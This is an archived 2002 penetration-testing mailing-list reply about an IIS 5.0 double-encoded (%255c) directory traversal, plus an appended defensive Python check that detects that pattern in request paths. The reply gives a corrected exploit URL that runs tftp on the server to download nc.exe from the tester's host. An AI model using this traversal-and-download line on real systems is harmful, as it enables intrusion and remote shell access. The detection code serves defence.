From: Coral J. Cook (cjcook@nosc.mil)
Date: Thu Jul 11 2002 - 14:54:12 EDT
> -----Original Message-----
> From: Gaziel, Avishay [mailto:agaziel@kpmg.com]
> Sent: Tuesday, July 09, 2002 9:33 AM
> To: PEN-TEST@securityfocus.com
> Subject: Can't get a shell
>
>
> Hi All,
> Situation:
> An IIS5.0 vulnerable to Unicode. ("double Unicode" i.e. ..%255c.. etc.)
> IIS sitting behind a firewall.
> Problem:
> host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-i+my
> server+get+nc.exe doesn't work
Here is the correct format:
host/scripts/..%255c.........../winnt/system32/tftp?+"-i"+myserver+GET+nc.exe
Notice that cmd.exe is removed and that -i is quoted: "-i".
That should fix your problem.
R,
Coral
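
Added example, not part of the original post: a defender-side check that flags request paths where a `..\` or `../` sequence only appears after a second round of percent-decoding, which is the "double Unicode" (`%255c`) pattern discussed in this thread. The function names and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# "..\" or "../" anywhere in the path
TRAVERSAL = re.compile(r"\.\.[\\/]")

def classify(uri_path):
    """Say at which decoding depth a directory traversal becomes visible."""
    if TRAVERSAL.search(uri_path):
        return "traversal"
    # latin-1 maps every decoded byte to one character, so nothing is lost
    once = unquote(uri_path, encoding="latin-1")
    if TRAVERSAL.search(once):
        return "encoded-traversal"
    # %25 decodes to "%", so %255c becomes %5c, and a second pass yields "\"
    twice = unquote(once, encoding="latin-1")
    if TRAVERSAL.search(twice):
        return "double-encoded-traversal"
    return "clean"

def scan(request_lines):
    """Return (verdict, line) for every request line that is not clean."""
    hits = []
    for line in request_lines:
        parts = line.split()
        if len(parts) < 2:
            continue  # not a "METHOD URI PROTOCOL" line
        path = parts[1].split("?", 1)[0]  # check the path, not the query
        verdict = classify(path)
        if verdict != "clean":
            hits.append((verdict, line))
    return hits

# Constructed sample request lines (not taken from any real log)
SAMPLE_REQUESTS = [
    "GET /images/logo%20small.gif HTTP/1.0",
    "GET /docs/100%25free.html HTTP/1.0",
    "GET /scripts/..%5c..%5cexample.txt HTTP/1.0",
    "GET /scripts/..%255c..%255cexample.txt?x=1 HTTP/1.0",
]

if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_REQUESTS):
        print(verdict, "|", line)
```

A filter that decodes once and then validates misses the last sample line; the check has to run on the form of the path that the server finally uses.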
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:23 EDT